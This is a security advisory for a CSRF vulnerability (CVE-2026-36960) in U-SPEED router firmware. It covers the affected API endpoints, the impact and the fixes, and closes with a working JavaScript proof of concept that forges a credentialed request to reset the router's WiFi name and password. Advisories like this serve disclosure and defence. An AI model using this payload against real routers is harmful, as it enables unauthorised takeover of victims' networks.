# CVE-2026-36960: Cross-Site Request Forgery (CSRF) Vulnerability in Web Management Interface

## Vulnerability Overview

* **CVE ID**: CVE-2026-36960
* **CVSS Score**: 8.8 (High)
* **Description**: The management API endpoints of U-SPEED Router Firmware V1.0.0 do not implement CSRF protection mechanisms (such as anti-CSRF tokens or strict Origin/Referer validation). An attacker can craft a malicious webpage and lure an authenticated administrator into visiting it; the victim's browser then sends forged HTTP requests, carrying the administrator's session, that perform administrative actions on the router.

## Impact Scope

* **Affected Product**: U-SPEED Router Firmware V1.0.0
* **Affected Endpoints**:
  * `/api/setWlan` (wireless network configuration)
  * `/api/telnet` (Telnet service configuration)
  * Other configuration endpoints (various management functions)
* **Potential Impact**:
  * Unauthorized modification of router configuration
  * WiFi network takeover
  * Telnet service manipulation
  * Denial of service for legitimate users

## Remediation

* Implement anti-CSRF tokens on all state-changing endpoints.
* Enforce strict Origin and Referer header validation.
* Use the `SameSite=Strict` cookie attribute on the session cookie.

## Proof-of-Concept Code (POC)

```javascript
// Cross-site request issued from the attacker's page: the browser attaches the
// administrator's session cookie because of credentials: 'include', and the
// router accepts it since no CSRF token or Origin check is performed.
fetch('http://192.168.10.1/api/setWlan', {
  method: 'POST',
  credentials: 'include',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({ ssid: "Hacked_Network", password: "Attacker123" })
});
```